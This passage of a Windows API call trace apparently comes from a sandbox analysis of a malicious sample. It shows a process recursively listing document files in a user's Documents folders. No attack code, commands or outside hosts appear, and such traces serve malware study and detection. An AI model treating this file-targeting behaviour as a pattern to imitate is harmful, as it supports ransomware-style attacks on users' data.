ftLastWriteTime.dwHighDateTime=0x1d5e78b, nFileSizeHigh=0x0, nFileSizeLow=0x168c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="-vqTeAwa6Vyq.ods", cAlternateFileName="-VQTEA~1.ODS")) returned 1 [0071.823] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.823] lstrlenW (lpString="-vqTeAwa6Vyq.ods") returned 16 [0071.823] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x116) returned 0x720fc8 [0071.823] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ae20270, ftCreationTime.dwHighDateTime=0x1d5d97a, ftLastAccessTime.dwLowDateTime=0xe86a27a0, ftLastAccessTime.dwHighDateTime=0x1d5e4f1, ftLastWriteTime.dwLowDateTime=0xe86a27a0, ftLastWriteTime.dwHighDateTime=0x1d5e4f1, nFileSizeHigh=0x0, nFileSizeLow=0x3fe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ep4-1OftiqYb.ppt", cAlternateFileName="EP4-1O~1.PPT")) returned 1 [0071.823] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.823] lstrlenW (lpString="ep4-1OftiqYb.ppt") returned 16 [0071.823] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x116) returned 0x7210e8 [0071.823] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a68c3f0, ftCreationTime.dwHighDateTime=0x1d5e7e3, ftLastAccessTime.dwLowDateTime=0xd0aef610, ftLastAccessTime.dwHighDateTime=0x1d5de1e, ftLastWriteTime.dwLowDateTime=0xd0aef610, ftLastWriteTime.dwHighDateTime=0x1d5de1e, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="iqiv2uXQ3uTRD.csv", cAlternateFileName="IQIV2U~1.CSV")) returned 1 [0071.823] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.823] lstrlenW (lpString="iqiv2uXQ3uTRD.csv") returned 17 [0071.823] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x118) returned 0x721208 [0071.823] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1c39050, ftCreationTime.dwHighDateTime=0x1d5e20f, ftLastAccessTime.dwLowDateTime=0x81e11af0, ftLastAccessTime.dwHighDateTime=0x1d5e7c3, ftLastWriteTime.dwLowDateTime=0x81e11af0, ftLastWriteTime.dwHighDateTime=0x1d5e7c3, nFileSizeHigh=0x0, nFileSizeLow=0xb65b, dwReserved0=0x0, dwReserved1=0x0, cFileName="OLgjUQnqccd626W.pdf", cAlternateFileName="OLGJUQ~1.PDF")) returned 1 [0071.823] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.823] lstrlenW (lpString="OLgjUQnqccd626W.pdf") returned 19 [0071.823] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11c) returned 0x721328 [0071.823] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1c39050, ftCreationTime.dwHighDateTime=0x1d5e20f, ftLastAccessTime.dwLowDateTime=0x81e11af0, ftLastAccessTime.dwHighDateTime=0x1d5e7c3, ftLastWriteTime.dwLowDateTime=0x81e11af0, ftLastWriteTime.dwHighDateTime=0x1d5e7c3, nFileSizeHigh=0x0, nFileSizeLow=0xb65b, dwReserved0=0x0, dwReserved1=0x0, cFileName="OLgjUQnqccd626W.pdf", cAlternateFileName="OLGJUQ~1.PDF")) returned 0 [0071.823] FindClose (in: hFindFile=0x1412f48 | out: hFindFile=0x1412f48) returned 1 [0071.823] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a030 | out: hHeap=0x6d0000) returned 1 [0071.823] FindNextFileW (in: hFindFile=0x71ef78, lpFindFileData=0x719898 | out: lpFindFileData=0x719898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30c812b0, ftCreationTime.dwHighDateTime=0x1d5e343, ftLastAccessTime.dwLowDateTime=0xcfa84de0, ftLastAccessTime.dwHighDateTime=0x1d5df02, ftLastWriteTime.dwLowDateTime=0xcfa84de0, ftLastWriteTime.dwHighDateTime=0x1d5df02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZMpMHpVtC4 chO8TI", cAlternateFileName="ZMPMHP~1")) returned 0 [0071.824] FindClose (in: hFindFile=0x71ef78 | out: hFindFile=0x71ef78) returned 1 [0071.824] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719898 | out: hHeap=0x6d0000) returned 1 [0071.824] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22dcc890, ftCreationTime.dwHighDateTime=0x1d5e1c1, ftLastAccessTime.dwLowDateTime=0x75de8480, ftLastAccessTime.dwHighDateTime=0x1d5e7e2, ftLastWriteTime.dwLowDateTime=0x75de8480, ftLastWriteTime.dwHighDateTime=0x1d5e7e2, nFileSizeHigh=0x0, nFileSizeLow=0x50a8, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="U7Eq.pdf", cAlternateFileName="")) returned 1 [0071.824] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.824] lstrlenW (lpString="U7Eq.pdf") returned 8 [0071.824] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x71aad0 [0071.824] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22dcc890, ftCreationTime.dwHighDateTime=0x1d5e1c1, ftLastAccessTime.dwLowDateTime=0x75de8480, ftLastAccessTime.dwHighDateTime=0x1d5e7e2, ftLastWriteTime.dwLowDateTime=0x75de8480, ftLastWriteTime.dwHighDateTime=0x1d5e7e2, nFileSizeHigh=0x0, nFileSizeLow=0x50a8, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="U7Eq.pdf", cAlternateFileName="")) returned 0 [0071.824] FindClose (in: hFindFile=0x709230 | out: hFindFile=0x709230) returned 1 [0071.824] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719be0 | out: hHeap=0x6d0000) returned 1 [0071.824] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0164690, ftCreationTime.dwHighDateTime=0x1d5b5d7, ftLastAccessTime.dwLowDateTime=0xf0754080, ftLastAccessTime.dwHighDateTime=0x1d57c58, ftLastWriteTime.dwLowDateTime=0xf0754080, ftLastWriteTime.dwHighDateTime=0x1d57c58, nFileSizeHigh=0x0, nFileSizeLow=0xf2f6, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="DALhTdxu9nC.xlsx", cAlternateFileName="DALHTD~1.XLS")) returned 1 [0071.824] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.824] lstrlenW (lpString="DALhTdxu9nC.xlsx") returned 16 [0071.824] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x71ceb8 [0071.824] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.824] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.824] lstrlenW (lpString="desktop.ini") returned 11 [0071.824] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e0c1850, ftCreationTime.dwHighDateTime=0x1d5c030, ftLastAccessTime.dwLowDateTime=0xa7d90050, ftLastAccessTime.dwHighDateTime=0x1d5d982, ftLastWriteTime.dwLowDateTime=0xa7d90050, ftLastWriteTime.dwHighDateTime=0x1d5d982, nFileSizeHigh=0x0, nFileSizeLow=0xd2d9, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="Dzsbxuif5Wbc.pptx", cAlternateFileName="DZSBXU~1.PPT")) returned 1 [0071.824] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.824] lstrlenW (lpString="Dzsbxuif5Wbc.pptx") returned 17 [0071.824] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xcc) returned 0x71cf90 [0071.825] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9407ad80, ftCreationTime.dwHighDateTime=0x1d5da8e, ftLastAccessTime.dwLowDateTime=0x1d92140, ftLastAccessTime.dwHighDateTime=0x1d5e020, ftLastWriteTime.dwLowDateTime=0x1d92140, ftLastWriteTime.dwHighDateTime=0x1d5e020, nFileSizeHigh=0x0, nFileSizeLow=0x948b, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="e0Py_V3m.xls", cAlternateFileName="")) returned 1 [0071.825] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.825] lstrlenW (lpString="e0Py_V3m.xls") returned 12 [0071.825] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc2) returned 0x719be0 [0071.825] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fb9170, ftCreationTime.dwHighDateTime=0x1d5e6bb, ftLastAccessTime.dwLowDateTime=0x131b9f70, ftLastAccessTime.dwHighDateTime=0x1d5e05f, ftLastWriteTime.dwLowDateTime=0x131b9f70, ftLastWriteTime.dwHighDateTime=0x1d5e05f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="GWaH", cAlternateFileName="")) returned 1 [0071.825] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.825] lstrlenW (lpString="GWaH") returned 4 [0071.825] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x71a030 [0071.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\*", lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fb9170, ftCreationTime.dwHighDateTime=0x1d5e6bb, ftLastAccessTime.dwLowDateTime=0x131b9f70, ftLastAccessTime.dwHighDateTime=0x1d5e05f, ftLastWriteTime.dwLowDateTime=0x131b9f70, ftLastWriteTime.dwHighDateTime=0x1d5e05f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71aba0 [0071.825] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fb9170, ftCreationTime.dwHighDateTime=0x1d5e6bb, ftLastAccessTime.dwLowDateTime=0x131b9f70, ftLastAccessTime.dwHighDateTime=0x1d5e05f, ftLastWriteTime.dwLowDateTime=0x131b9f70, ftLastWriteTime.dwHighDateTime=0x1d5e05f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.825] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.825] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15dc2490, ftCreationTime.dwHighDateTime=0x1d5e579, ftLastAccessTime.dwLowDateTime=0x75ec36d0, ftLastAccessTime.dwHighDateTime=0x1d5dd73, ftLastWriteTime.dwLowDateTime=0x75ec36d0, ftLastWriteTime.dwHighDateTime=0x1d5dd73, nFileSizeHigh=0x0, nFileSizeLow=0x15678, dwReserved0=0x0, dwReserved1=0x0, cFileName="7hSMvVsIoU.docx", cAlternateFileName="7HSMVV~1.DOC")) returned 1 [0071.825] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.825] lstrlenW (lpString="7hSMvVsIoU.docx") returned 15 [0071.825] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x719cb0 [0071.825] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a6d010, ftCreationTime.dwHighDateTime=0x1d5e5d0, ftLastAccessTime.dwLowDateTime=0xafc82240, ftLastAccessTime.dwHighDateTime=0x1d5d91f, ftLastWriteTime.dwLowDateTime=0xafc82240, ftLastWriteTime.dwHighDateTime=0x1d5d91f, nFileSizeHigh=0x0, nFileSizeLow=0x18e0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="V7jJ.pptx", cAlternateFileName="V7JJ~1.PPT")) returned 1 [0071.825] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.825] lstrlenW (lpString="V7jJ.pptx") returned 9 [0071.825] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc6) returned 0x719890 [0071.826] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a6d010, ftCreationTime.dwHighDateTime=0x1d5e5d0, ftLastAccessTime.dwLowDateTime=0xafc82240, ftLastAccessTime.dwHighDateTime=0x1d5d91f, ftLastWriteTime.dwLowDateTime=0xafc82240, ftLastWriteTime.dwHighDateTime=0x1d5d91f, nFileSizeHigh=0x0, nFileSizeLow=0x18e0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="V7jJ.pptx", cAlternateFileName="V7JJ~1.PPT")) returned 0 [0071.826] FindClose (in: hFindFile=0x71aba0 | out: hFindFile=0x71aba0) returned 1 [0071.826] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a030 | out: hHeap=0x6d0000) returned 1 [0071.826] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.826] lstrlenW (lpString="lfguv.xlsx") returned 10 [0071.826] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x719960 [0071.826] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.826] lstrlenW (lpString="My Music") returned 8 [0071.826] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x71a030 [0071.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x721450, ftCreationTime.dwLowDateTime=0x719a28, ftCreationTime.dwHighDateTime=0x1d5e5d0, ftLastAccessTime.dwLowDateTime=0xafc82240, ftLastAccessTime.dwHighDateTime=0x1d5d91f, ftLastWriteTime.dwLowDateTime=0xafc82240, ftLastWriteTime.dwHighDateTime=0x1d5d91f, nFileSizeHigh=0x0, nFileSizeLow=0x18e0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="V7jJ.pptx", cAlternateFileName="V7JJ~1.PPT")) returned 0xffffffff [0071.826] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a030 | out: hHeap=0x6d0000) returned 1 [0071.826] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.826] lstrlenW (lpString="My Pictures") returned 11 [0071.826] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x71a030 [0071.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x721450, ftCreationTime.dwLowDateTime=0x719a28, ftCreationTime.dwHighDateTime=0x1d5e5d0, ftLastAccessTime.dwLowDateTime=0xafc82240, ftLastAccessTime.dwHighDateTime=0x1d5d91f, ftLastWriteTime.dwLowDateTime=0xafc82240, ftLastWriteTime.dwHighDateTime=0x1d5d91f, nFileSizeHigh=0x0, nFileSizeLow=0x18e0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="V7jJ.pptx", cAlternateFileName="V7JJ~1.PPT")) returned 0xffffffff [0071.827] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a030 | out: hHeap=0x6d0000) returned 1 [0071.827] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.827] lstrlenW (lpString="My Shapes") returned 9 [0071.827] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x71a030 [0071.827] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71aba0 [0071.829] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.829] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.829] lstrlenW (lpString="desktop.ini") returned 11 [0071.829] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.829] lstrlenW (lpString="Favorites.vss") returned 13 [0071.829] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.829] lstrlenW (lpString="_private") returned 8 [0071.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x722458 | out: lpFindFileData=0x722458*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x709230 [0071.833] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.835] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.835] lstrlenW (lpString="folder.ico") returned 10 [0071.835] FindClose (in: hFindFile=0x709230 | out: hFindFile=0x709230) returned 1 [0071.857] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722458 | out: hHeap=0x6d0000) returned 1 [0071.857] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0071.857] FindClose (in: hFindFile=0x71aba0 | out: hFindFile=0x71aba0) returned 1 [0071.857] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a030 | out: hHeap=0x6d0000) returned 1 [0071.857] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0071.858] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.858] lstrlenW (lpString="My Videos") returned 9 [0071.858] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x7227a0, ftCreationTime.dwLowDateTime=0x1312240, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0071.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a030 | out: hHeap=0x6d0000) returned 1 [0071.873] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84254470, ftCreationTime.dwHighDateTime=0x1d5e698, ftLastAccessTime.dwLowDateTime=0xbc763680, ftLastAccessTime.dwHighDateTime=0x1d5e36a, ftLastWriteTime.dwLowDateTime=0xbc763680, ftLastWriteTime.dwHighDateTime=0x1d5e36a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="NHqD6Bz", cAlternateFileName="")) returned 1 [0071.873] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.874] lstrlenW (lpString="NHqD6Bz") returned 7 [0071.874] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\*", lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84254470, ftCreationTime.dwHighDateTime=0x1d5e698, ftLastAccessTime.dwLowDateTime=0xbc763680, ftLastAccessTime.dwHighDateTime=0x1d5e36a, ftLastWriteTime.dwLowDateTime=0xbc763680, ftLastWriteTime.dwHighDateTime=0x1d5e36a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71aba0 [0071.874] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84254470, ftCreationTime.dwHighDateTime=0x1d5e698, ftLastAccessTime.dwLowDateTime=0xbc763680, ftLastAccessTime.dwHighDateTime=0x1d5e36a, ftLastWriteTime.dwLowDateTime=0xbc763680, ftLastWriteTime.dwHighDateTime=0x1d5e36a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.874] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.874] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d78f7c0, ftCreationTime.dwHighDateTime=0x1d5e48e, ftLastAccessTime.dwLowDateTime=0xea0af930, ftLastAccessTime.dwHighDateTime=0x1d5d926, ftLastWriteTime.dwLowDateTime=0xea0af930, ftLastWriteTime.dwHighDateTime=0x1d5d926, nFileSizeHigh=0x0, nFileSizeLow=0x1479d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ggmDD6kRAmVW.pdf", cAlternateFileName="GGMDD6~1.PDF")) returned 1 [0071.874] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.874] lstrlenW (lpString="ggmDD6kRAmVW.pdf") returned 16 [0071.874] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.874] lstrlenW (lpString="ieo365UUaQ2eNMAxgYb") returned 19 [0071.874] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\*", lpFindFileData=0x722458 | out: lpFindFileData=0x722458*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3cebeb0, ftCreationTime.dwHighDateTime=0x1d5d9ae, ftLastAccessTime.dwLowDateTime=0x667afcf0, ftLastAccessTime.dwHighDateTime=0x1d5db15, ftLastWriteTime.dwLowDateTime=0x667afcf0, ftLastWriteTime.dwHighDateTime=0x1d5db15, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x709230 [0071.874] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x722458 | out: lpFindFileData=0x722458*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3cebeb0, ftCreationTime.dwHighDateTime=0x1d5d9ae, ftLastAccessTime.dwLowDateTime=0x667afcf0, ftLastAccessTime.dwHighDateTime=0x1d5db15, ftLastWriteTime.dwLowDateTime=0x667afcf0, ftLastWriteTime.dwHighDateTime=0x1d5db15, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.874] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.874] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x722458 | out: lpFindFileData=0x722458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6089b40, ftCreationTime.dwHighDateTime=0x1d5e03a, ftLastAccessTime.dwLowDateTime=0x6b893e10, ftLastAccessTime.dwHighDateTime=0x1d5e25d, ftLastWriteTime.dwLowDateTime=0x6b893e10, ftLastWriteTime.dwHighDateTime=0x1d5e25d, nFileSizeHigh=0x0, nFileSizeLow=0x13f1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="-O4-7ZIzYB1H.pdf", cAlternateFileName="-O4-7Z~1.PDF")) returned 1 [0071.874] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.874] lstrlenW (lpString="-O4-7ZIzYB1H.pdf") returned 16 [0071.875] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.875] lstrlenW (lpString="99NHfhQ2P47BccIqzu") returned 18 [0071.875] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\99NHfhQ2P47BccIqzu\\*", lpFindFileData=0x7228b0 | out: lpFindFileData=0x7228b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x982b7800, ftCreationTime.dwHighDateTime=0x1d5dbca, ftLastAccessTime.dwLowDateTime=0x801403a0, ftLastAccessTime.dwHighDateTime=0x1d5de21, ftLastWriteTime.dwLowDateTime=0x801403a0, ftLastWriteTime.dwHighDateTime=0x1d5de21, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4643627a, dwReserved1=0x4f372b77, cFileName=".", cAlternateFileName="")) returned 0x1412f48 [0071.875] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x7228b0 | out: 